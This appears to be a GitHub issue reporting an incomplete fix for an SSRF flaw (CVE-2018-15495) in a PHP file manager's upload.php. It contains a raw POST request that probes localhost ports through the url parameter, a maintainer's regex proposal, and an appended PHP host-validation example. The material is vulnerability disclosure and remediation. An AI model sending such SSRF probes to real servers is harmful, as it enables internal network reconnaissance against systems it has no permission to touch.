SSRF not been fully fixed in upload.php #506

Open
donot-wong opened this issue Oct 30, 2018 · 1 comment

commented Oct 30, 2018

In upload.php we can download a pic from a remote server (code in lines 68~91).
A Jul 27, 2018 commit added a fix to limit the url in order to prohibit the SSRF vuln
CVE-2018-15495
but the fix only checks that the param url starts with http:// or https://.
We can still use the http protocol to probe the intranet and attack intranet servers. For example:

```http
POST /filemanager/upload.php HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9gov40jg57e4bo2olu5rqr8oc0; login=76a61a8504394f9c08ec4d7d747d3377
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

fldr=test/&url=http://127.0.0.1:2233/aaaaaaa
```

and when the port is open it will respond `{"error":"Invalid URL"}`.


trippo (Owner) commented Nov 7, 2018

If you edit the regex to:

```php
$urlPattern = '/^(https?:\/\/)?([\da-z\.-]+\.[a-z\.]{2,6}|[\d\.]+)([\/\?=&#]{1}[\da-z\.-]+)*[\/\?]?$/i';
```

it's possible to block the SSRF attack, am I right?
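
As an added example, not code from the issue or from the project, here is the kind of check the url parameter in upload.php needs instead of a pattern on the URL string: a regex cannot tell where a host name resolves, so this parses the URL, limits scheme and port, resolves the host and rejects loopback, private and reserved addresses. Function names are hypothetical.

```php
<?php
// Added example, not the project's code; function names are hypothetical. A regex on the URL
// string cannot tell where the host resolves, so this resolves it and checks the address ranges.

/** True when $ip is a public address: loopback, RFC 1918, link-local and reserved ranges fail. */
function isPublicIp(string $ip): bool
{
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    return filter_var($ip, FILTER_VALIDATE_IP, $flags) !== false;
}

/** Returns null when $url may be fetched, otherwise the reason it was rejected. */
function remoteUrlProblem(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false || empty($p['host'])) {
        return 'unparseable URL or missing host';
    }
    if (!in_array(strtolower($p['scheme'] ?? ''), ['http', 'https'], true)) {
        return 'scheme not allowed';
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return 'credentials in URL not allowed';
    }
    // Only default web ports: a free port choice is what turns the download into a service probe.
    if (isset($p['port']) && !in_array($p['port'], [80, 443], true)) {
        return 'non-standard port ' . $p['port'];
    }
    $host = trim($p['host'], '[]');            // parse_url keeps IPv6 literals bracketed
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $addrs = [$host];                      // literal address, nothing to resolve
    } else {
        $addrs = gethostbynamel($host) ?: [];  // IPv4 A records of the name
        if ($addrs === []) {
            return 'host does not resolve';
        }
    }
    foreach ($addrs as $ip) {                  // every answer must be public, not just the first
        if (!isPublicIp($ip)) {
            return "host resolves to non-public address $ip";
        }
    }
    return null;
}

// Constructed inputs: the loopback URL from the report, and the same host on the default port.
foreach (['http://127.0.0.1:2233/aaaaaaa', 'http://127.0.0.1/aaaaaaa'] as $u) {
    echo $u, ' => ', remoteUrlProblem($u) ?? 'ok', PHP_EOL;
}
```

The fetch that follows should be pinned to the address just checked (curl's CURLOPT_RESOLVE) with CURLOPT_FOLLOWLOCATION disabled, because a second DNS lookup or a redirect can otherwise land on a different host than the one validated.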
